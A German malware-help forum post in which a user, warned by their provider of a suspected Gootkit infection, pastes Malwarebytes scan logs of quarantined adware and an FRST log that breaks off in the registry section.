| |
| |||||||
Log-Analyse und Auswertung: Windows 10. Information von meinem Provider zu gootkit TrojanerWindows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML |
 |
28.11.2020, 13:35
| #1 |
| |  Windows 10. Information von meinem Provider zu gootkit Trojaner Hallo, ich habe von meinem Internet Provider einen Brief bekommen, dass das BSI Informationen erhalten hat, wonach mein PC mit dem Gootkit Trojaner infiziert sein soll. Ich habe Malewarebytes drüber laufen lassen und die Funde in Quarantäne geschoben. Code:
ATTFilter Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 26.11.20
Scan-Zeit: 17:35
Protokolldatei: 6adfc802-3005-11eb-b1a9-c85b76d1224b.json
-Softwaredaten-
Version: 4.2.3.96
Komponentenversion: 1.0.1122
Version des Aktualisierungspakets: 1.0.33458
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 10 (Build 18362.1198)
CPU: x64
Dateisystem: NTFS
Benutzer: HSE\seife
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 298586
Erkannte Bedrohungen: 63
In die Quarantäne verschobene Bedrohungen: 63
Abgelaufene Zeit: 2 Min., 15 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung
-Scan-Details-
Prozess: 1
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe, In Quarantäne, 601, 557990, , , , , A841C3D335907BA5EC4C2E070BE1DF53, 1B94AAA71618D4ECBA665130AE54EF38B17794157123675B24641DC85A379426
Modul: 1
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe, In Quarantäne, 601, 557990, , , , , A841C3D335907BA5EC4C2E070BE1DF53, 1B94AAA71618D4ECBA665130AE54EF38B17794157123675B24641DC85A379426
Registrierungsschlüssel: 9
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\AM, In Quarantäne, 3395, 401432, 1.0.33458, , ame, , ,
PUP.Optional.GoodGame.ShrtCln, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\GoodGame.de, In Quarantäne, 4494, 401580, , , , , ,
PUP.Optional.VLCUpdaterDE, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VLC Updater, In Quarantäne, 1729, 353751, , , , , ,
PUP.Optional.ChipDe, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\chip1click, In Quarantäne, 601, 557990, , , , , ,
PUP.Optional.StartFenster, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\djhangopedggnlnicpbjklghlckmndge, In Quarantäne, 494, 354303, 1.0.33458, , ame, , ,
PUP.Optional.GreatDealz, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\lobonlhedgiilkfmbbbfhkaoefacipgj, In Quarantäne, 2056, 466866, 1.0.33458, , ame, , ,
PUP.Optional.ChipDe, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{503CA94E-0834-4CEE-AD92-BA17AF4E809A}, In Quarantäne, 601, 458401, 1.0.33458, , ame, , ,
PUP.Optional.ChipDe, HKLM\SYSTEM\SETUP\FIRSTBOOT\SERVICES\chip1click, In Quarantäne, 601, 567244, 1.0.33458, , ame, , ,
PUP.Optional.ChipDe, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\chip 1-click download service, In Quarantäne, 601, 463412, 1.0.33458, , ame, , ,
Registrierungswert: 5
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\AM|STARTFENSTER SYMBOL, In Quarantäne, 3395, 401432, 1.0.33458, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\AM|STARTFENSTER-REPLACE, In Quarantäne, 3395, 401432, 1.0.33458, , ame, , ,
PUP.Optional.GoodGame.ShrtCln, HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\AM|GOODGAME, In Quarantäne, 4494, 401601, 1.0.33458, , ame, , ,
PUP.Optional.StartFenster, HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|DJHANGOPEDGGNLNICPBJKLGHLCKMNDGE, In Quarantäne, 494, 354303, , , , , ,
PUP.Optional.GreatDealz, HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\SOFTWARE\GOOGLE\CHROME\PREFERENCEMACS\Default\extensions.settings|LOBONLHEDGIILKFMBBBFHKAOEFACIPGJ, In Quarantäne, 2056, 466866, , , , , ,
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 10
PUP.Optional.GoodGame.ShrtCln, C:\PROGRAM FILES (X86)\GOODGAME, In Quarantäne, 4494, 401580, 1.0.33458, , ame, , ,
PUP.Optional.VLCUpdaterDE, C:\USERS\SEIFE\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\VLC UPDATER, In Quarantäne, 1729, 353749, 1.0.33458, , ame, , ,
PUP.Optional.VLCUpdaterDE, C:\PROGRAM FILES (X86)\VLC UPDATER, In Quarantäne, 1729, 353751, 1.0.33458, , ame, , ,
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click, In Quarantäne, 601, 557990, , , , , ,
PUP.Optional.ChipDe, C:\PROGRAM FILES (X86)\CHIP DIGITAL GMBH, In Quarantäne, 601, 557990, 1.0.33458, , ame, , ,
PUP.Optional.GreatDealz, C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\jetpack\@greatdealz\simple-storage, In Quarantäne, 2056, 379670, , , , , ,
PUP.Optional.GreatDealz, C:\USERS\SEIFE\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\9YMM54TG.DEFAULT\JETPACK\@GREATDEALZ, In Quarantäne, 2056, 379670, 1.0.33458, , ame, , ,
PUP.Optional.GreatDealz, C:\PROGRAM FILES (X86)\GREATDEALZ, In Quarantäne, 2056, 388477, 1.0.33458, , ame, , ,
PUP.Optional.StartFenster, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Extensions\DJHANGOPEDGGNLNICPBJKLGHLCKMNDGE, In Quarantäne, 494, 354303, , , , , ,
PUP.Optional.GreatDealz, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Extensions\LOBONLHEDGIILKFMBBBFHKAOEFACIPGJ, In Quarantäne, 2056, 466866, , , , , ,
Datei: 37
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\FAVORITES\GoodGame BigFarm spielen.lnk, In Quarantäne, 4494, 401584, 1.0.33458, , ame, , D014F7E737703BC37DC82A5727C19C28, 5C03A06D4329533D2AB1CDDAA61107E3C1931FF986F14556EE4E452A9D368399
PUP.Optional.StartFenster, C:\USERS\SEIFE\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\USER PINNED\TASKBAR\STARTFENSTER SYMBOL.LNK, In Quarantäne, 494, 350108, 1.0.33458, , ame, , 339C94B0C8A6281F2092D3408BD40715, 2D394F550B98F50CD9C7A66EB2D4659195E3D7EE5F8C29A338CF89F492C46389
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\FAVORITES\GoodGame Empire spielen.lnk, In Quarantäne, 4494, 401584, 1.0.33458, , ame, , 63101F3F80ECFD6DF8905E6A8968D052, 59F9D074D2026F8D9C5847B8D9F8B89509E375361F9E2E27FB5DD66F81EE92DA
PUP.Optional.GoodGame.ShrtCln, C:\PROGRAM FILES (X86)\GOODGAME\SETUP.ICO, In Quarantäne, 4494, 401580, 1.0.33458, , ame, , 58E4B64420F84EFA71F0CE29CD50429E, BA306550D41BE6E77BB836384504AC1979F467320295E6BE2A2F39433DF7A7A6
PUP.Optional.GoodGame.ShrtCln, C:\Program Files (x86)\GoodGame\bigfarm.ico, In Quarantäne, 4494, 401580, , , , , 45B821EB95557B6B7E00289F22C1BA24, 4C02D9BF5497A4CCA25F054311C0C12E64495E9AC2EA235A6E8787029ED99CBF
PUP.Optional.GoodGame.ShrtCln, C:\Program Files (x86)\GoodGame\empire.ico, In Quarantäne, 4494, 401580, , , , , 58A5323B66D3334572DA30572A369CE9, AE64EBDD1309C30F4778244330EEC7ED6EEEB96A363426586519E3C4356CC67A
PUP.Optional.GoodGame.ShrtCln, C:\Program Files (x86)\GoodGame\uninstall.exe, In Quarantäne, 4494, 401580, , , , , 22B7760B5112010A53D50F11A5DB1080, 9DF03A00FBC37959E0811C9A85BB65F91F9A7DD05CB68C039111ED69E0A05179
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\FAVORITES\LINKS\GoodGame BigFarm spielen.lnk, In Quarantäne, 4494, 401583, 1.0.33458, , ame, , D014F7E737703BC37DC82A5727C19C28, 5C03A06D4329533D2AB1CDDAA61107E3C1931FF986F14556EE4E452A9D368399
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\FAVORITES\LINKS\GoodGame Empire spielen.lnk, In Quarantäne, 4494, 401583, 1.0.33458, , ame, , 63101F3F80ECFD6DF8905E6A8968D052, 59F9D074D2026F8D9C5847B8D9F8B89509E375361F9E2E27FB5DD66F81EE92DA
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\GoodGame BigFarm spielen.lnk, In Quarantäne, 4494, 401585, 1.0.33458, , ame, , D014F7E737703BC37DC82A5727C19C28, 5C03A06D4329533D2AB1CDDAA61107E3C1931FF986F14556EE4E452A9D368399
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\GoodGame Empire spielen.lnk, In Quarantäne, 4494, 401585, 1.0.33458, , ame, , 63101F3F80ECFD6DF8905E6A8968D052, 59F9D074D2026F8D9C5847B8D9F8B89509E375361F9E2E27FB5DD66F81EE92DA
PUP.Optional.Amazon1Button, C:\USERS\SEIFE\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\9YMM54TG.DEFAULT\EXTENSIONS\ABB@AMAZON.COM.XPI, In Quarantäne, 3208, 493346, 1.0.33458, , ame, , 580B9A8F94DA8D6579C35ACA9A7A43AE, 053676C3BB6FC9DAC14AAA29A688CE39680AD263E3F52877E166AA01B293EFD5
PUP.Optional.GoodGame.ShrtCln, C:\USERS\SEIFE\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\USER PINNED\TASKBAR\GOODGAME.LNK, In Quarantäne, 4494, 401586, 1.0.33458, , ame, , D014F7E737703BC37DC82A5727C19C28, 5C03A06D4329533D2AB1CDDAA61107E3C1931FF986F14556EE4E452A9D368399
PUP.Optional.VLCUpdaterDE, C:\USERS\SEIFE\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\VLC UPDATER\SOFTWARE DEINSTALLIEREN.LNK, In Quarantäne, 1729, 353749, 1.0.33458, , ame, , 7902F44F3D505149126E72C962E603F5, 82A25A696A13D98CBB5E605596894D816A6F6DC2250CC3D37CE951F932148A9D
PUP.Optional.VLCUpdaterDE, C:\PROGRAM FILES (X86)\VLC UPDATER\SETUP.ICO, In Quarantäne, 1729, 353751, 1.0.33458, , ame, , 6F7E92FE7E6A62661AC2B41528A78FC6, FD9B5998B98EE0BA86ED7687F215A1CDDE90C00B0B1CD11DC83E3614389CB6AD
PUP.Optional.VLCUpdaterDE, C:\Program Files (x86)\VLC Updater\uninstall.exe, In Quarantäne, 1729, 353751, , , , , F1147A97FDBC00872580A777E4C81953, 66C0946A93829C3EDC181E95DAC3DE4911AC5BDE14C35AC51E0EB4D37CE9D5D3
PUP.Optional.ChipDe, C:\PROGRAM FILES (X86)\CHIP DIGITAL GMBH\CHIP1CLICK\CHIP 1-CLICK INSTALLER.EXE.CONFIG, In Quarantäne, 601, 557990, 1.0.33458, , ame, , 79AB1F86C95380F225B38B3156D88C8B, 07B9A498F8A4945F9DF7C23CFF9FAE0DAE1F65D3B10B62C0B347620469E19837
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\chip 1-click installer.exe, In Quarantäne, 601, 557990, , , , , A841C3D335907BA5EC4C2E070BE1DF53, 1B94AAA71618D4ECBA665130AE54EF38B17794157123675B24641DC85A379426
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Active Download.exe, In Quarantäne, 601, 557990, , , , , A8ECFF96EAB3E17534EE87AABE156142, 87C9D7EB19881DFA63C09C3BDBC8181F73741C595272C1E2F174F5C63F986F67
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Starter.exe, In Quarantäne, 601, 557990, , , , , D1D3EE3A9C224B0DF3B5C9F324203ABB, A2923215995583039C9064CFC53E770C6DF15D63F643CA0B43A5AA3AD6C5C061
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\CHIP Updater.exe, In Quarantäne, 601, 557990, , , , , 55D793BBA6CDBB34D23E2E33F4ADB42C, 3C4E110A39C9CE8B2D9FF8F611C0AC2EFCEDEF2E3FD8DED008831EC9EF69CED9
PUP.Optional.ChipDe, C:\Program Files (x86)\Chip Digital GmbH\chip1click\SplashForm.exe, In Quarantäne, 601, 557990, , , , , 13CDEEA76C81C535F362BBD9251D778A, EACD2D919FB314A8E5192097141A56C2094C214E27E11CAC93AF0AF936BF869C
PUP.Optional.GoodGame.ShrtCln, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\GOODGAME\GoodGame BigFarm spielen.lnk, In Quarantäne, 4494, 401581, 1.0.33458, , ame, , D014F7E737703BC37DC82A5727C19C28, 5C03A06D4329533D2AB1CDDAA61107E3C1931FF986F14556EE4E452A9D368399
PUP.Optional.GoodGame.ShrtCln, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\GOODGAME\GoodGame Empire spielen.lnk, In Quarantäne, 4494, 401581, 1.0.33458, , ame, , 63101F3F80ECFD6DF8905E6A8968D052, 59F9D074D2026F8D9C5847B8D9F8B89509E375361F9E2E27FB5DD66F81EE92DA
PUP.Optional.GoodGame.ShrtCln, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\GoodGame BigFarm spielen.lnk, In Quarantäne, 4494, 401587, 1.0.33458, , ame, , D014F7E737703BC37DC82A5727C19C28, 5C03A06D4329533D2AB1CDDAA61107E3C1931FF986F14556EE4E452A9D368399
PUP.Optional.GoodGame.ShrtCln, C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\GoodGame Empire spielen.lnk, In Quarantäne, 4494, 401587, 1.0.33458, , ame, , 63101F3F80ECFD6DF8905E6A8968D052, 59F9D074D2026F8D9C5847B8D9F8B89509E375361F9E2E27FB5DD66F81EE92DA
PUP.Optional.GreatDealz, C:\Users\seife\AppData\Roaming\Mozilla\Firefox\Profiles\9ymm54tg.default\jetpack\@greatdealz\simple-storage\store.json, In Quarantäne, 2056, 379670, , , , , 120329612D1DB8808CD800ED184FA5A5, DA3A98F66541EB4B164BB3AECD611A2EFFA75B3DF2D98D468D6B76DFACD9704E
PUP.Optional.GreatDealz, C:\Program Files (x86)\GreatDealz\lobonlhedgiilkfmbbbfhkaoefacipgj.crx, In Quarantäne, 2056, 388477, , , , , B1E1330B22C6F8699EE0E9948C45BD02, 32D785AF99D02635D19292CE03C8C4B190752B3077EB74A160F6B4466EAD7669
PUP.Optional.StartFenster, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Ersetzt, 494, 354303, , , , , D33F609A83CE8406AD5EA6703FC4F936, AA83BB8C6122C10B6713777B3EA8272398BECF388A9333540D017A69E0EDF867
PUP.Optional.StartFenster, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Ersetzt, 494, 354303, , , , , 5A7A961F95506FD5F74257651805A6CC, 920FE19454FBEC2B29C68BDA4DCC6D773BDF3F598EAC878F1E8CF7B1F13A0982
PUP.Optional.GreatDealz, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Ersetzt, 2056, 466866, , , , , D33F609A83CE8406AD5EA6703FC4F936, AA83BB8C6122C10B6713777B3EA8272398BECF388A9333540D017A69E0EDF867
PUP.Optional.GreatDealz, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Ersetzt, 2056, 466866, , , , , 5A7A961F95506FD5F74257651805A6CC, 920FE19454FBEC2B29C68BDA4DCC6D773BDF3F598EAC878F1E8CF7B1F13A0982
PUP.Optional.Conduit, C:\USERS\SEIFE\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\9YMM54TG.DEFAULT\PREFS.JS, Ersetzt, 193, 301520, 1.0.33458, , ame, , 93592B11BE616127573BD382E3BF567B, 79BAD4B3B465B4F6A085214F2144029661F567AEC012293769EA9988F99AFB0C
PUP.Optional.ChipDe, C:\WINDOWS\INSTALLER\3C9CFBF3.MSI, In Quarantäne, 601, 557991, 1.0.33458, , ame, , DD85FF75F142CFA6B7DD7955DC5914F0, C26A8FF8AD1FC72873EB7C975214D9DD0CD5EE8AFD663E662136677ADB5579FE
PUP.Optional.ChipDe, C:\USERS\SEIFE\APPDATA\LOCAL\DOWNLOADED INSTALLATIONS\{DAD82379-C684-4D04-83D5-2B9934A9C362}\CHIP INSTALLER.MSI, In Quarantäne, 601, 594115, 1.0.33458, , ame, , B611022B10D24A0DEFC90AAFA7DDA4DA, 04D0380AE3F5F63DC514B46A65FE26114E69B2610F644F8BD9114D8460CBFEB8
PUP.Optional.StartFenster, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Ersetzt, 494, 455286, 1.0.33458, , ame, , D33F609A83CE8406AD5EA6703FC4F936, AA83BB8C6122C10B6713777B3EA8272398BECF388A9333540D017A69E0EDF867
PUP.Optional.StartFenster, C:\USERS\SEIFE\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Ersetzt, 494, 455286, 1.0.33458, , ame, , D33F609A83CE8406AD5EA6703FC4F936, AA83BB8C6122C10B6713777B3EA8272398BECF388A9333540D017A69E0EDF867
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
WMI: 0
(keine bösartigen Elemente erkannt)
(end)
Heute habe ich es nochmal gemacht und es wurde nichts mehr gefunden: Code:
ATTFilter Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 28.11.20
Scan-Zeit: 13:21
Protokolldatei: 4f09d0f8-3174-11eb-92ee-c85b76d1224b.json
-Softwaredaten-
Version: 4.2.3.96
Komponentenversion: 1.0.1122
Version des Aktualisierungspakets: 1.0.33536
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 10 (Build 18362.1198)
CPU: x64
Dateisystem: NTFS
Benutzer: HSE\seife
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 296470
Erkannte Bedrohungen: 0
In die Quarantäne verschobene Bedrohungen: 0
Abgelaufene Zeit: 1 Min., 19 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung
-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)
Modul: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)
Registrierungswert: 0
(keine bösartigen Elemente erkannt)
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 0
(keine bösartigen Elemente erkannt)
Datei: 0
(keine bösartigen Elemente erkannt)
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
WMI: 0
(keine bösartigen Elemente erkannt)
(end)
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 28-11-2020
durchgeführt von seife (Administrator) auf HSE (LENOVO 80TV) (28-11-2020 13:17:06)
Gestartet von C:\Users\seife\Desktop
Geladene Profile: seife
Platform: Windows 10 Home Version 1909 18363.1198 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe
(Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe
(Conexant Systems, Inc.) [Datei ist nicht signiert] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe
(CyberLink Corp. -> CyberLink Corp.) C:\Program Files (x86)\Lenovo\Lenovo Photo Master\PhotoMasterImportAgent.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
(Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDIntelligent.exe
(ELAN Microelectronics Corporation -> ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Huawei Technologies Co., Ltd. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation) C:\Windows\System32\ibtsiva.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation-Wireless Connectivity Solutions -> Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe
(Intel(R) pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe
(Lenovo -> Lenovo Group Ltd.) C:\Program Files (x86)\Lenovo\VantageService\3.3.115.0\LenovoVantageService.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.SettingsApp.exe <2>
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe <2>
(Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe
(LENOVO -> Lenovo(beijing) Limited) C:\ProgramData\Lenovo\ImController\Plugins\IdeaOSDPackage\x64\utility.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\CCSDK\CCSDK.exe
(LENOVO -> Lenovo) C:\Program Files (x86)\Lenovo\GDCAgentSetupRed\GDCAgent.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Users\seife\AppData\Local\Microsoft\OneDrive\OneDrive.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_12011.1001.1.0_x64__8wekyb3d8bbwe\WinStore.App.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.20092.10311.0_x64__8wekyb3d8bbwe\Music.UI.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe <8>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Piriform Software Ltd -> Piriform Software Ltd) C:\Program Files\CCleaner\CCleaner64.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> )
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [LenovoUtility] => C:\ProgramData\Lenovo\ImController\Plugins\IdeaOSDPackage\x64\utility.exe [911272 2017-07-27] (LENOVO -> Lenovo(beijing) Limited)
HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.)
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2235809649-4173297830-2174137979-1001\...\Run: [PhotoMasterImportAgent] => C:\Program Files (x86)\Lenovo\Lenovo Photo Master\PhotoMasterImportAgent.exe [675608 2016-04-22] (CyberLink Corp. -> CyberLink Corp.)
